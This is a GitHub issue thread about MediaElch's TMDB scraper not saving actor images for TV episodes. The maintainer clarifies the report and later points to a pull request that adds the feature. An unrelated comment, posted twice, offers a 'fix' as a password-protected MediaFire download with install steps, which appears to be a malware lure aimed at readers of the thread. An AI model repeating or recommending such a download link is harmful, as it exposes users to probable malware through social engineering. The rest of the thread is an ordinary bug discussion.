### ISSUE TITLE
Bug: Wont scrape actor images if disable actors on tmdb for show

### ISSUE THREAD

**Issue by kolbdog323** [Komet/MediaElch#1792]
I noticed if you disable actors for the tmdb scraper it wont scrape any actor images for the tv show it wont scrape the ators wich is expected but i still thought you could get the actor images when you scrape the episode. Also It will scrape the actors for the episode itself but none of the actor images for the episode.

Also would be nice if you could paste a url from online to get the actor image instead of always downloaidng it first then click the blank actor image and uploading it that way.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by bugwelle** [comment]
Hi,

thanks for bringing this up. I don't fully get what you're saying. If I understood you correctly, then:

- you disable "actors" for episodes for TMDB
- no actor images are loaded from TMDB

Is that correct? Or did you disable actor images for TV shows?

Regards,
Andre

**Comment by kolbdog323** [comment]
I meant if disable actors on show level and only want to scrape actors for episodes only it won't scrape any actor images just the actors and roles for episodes won't scrape the actor images for the episodes.
Also be nice if could paste a url for actor images so don't have to click the box where the actor image normally goes and find the downloaded actor image on computer. So that way you can assign your own actors and roles to the episodes and don't have to download the image from website you originalky found thr actor not the ones from themoviedb

**Comment by kolbdog323** [comment]
I disabled actors for tv show but the actors for episodes are enabled but it doesnt scrape any actor images like save them locally into an actor folder if only have actors enabled for the episodes. Like it wil scrape the actors but none are saved into a .actor folder if make sense.

**Comment by bugwelle** [comment]
Ah, actor images for episodes! Sorry about that. It's sadly not supported, yet.
See your other issue https://github.com/Komet/MediaElch/issues/1784

**Comment by bugwelle** [comment]
With https://github.com/Komet/MediaElch/pull/1797, episode actor images will finally be loaded. :)
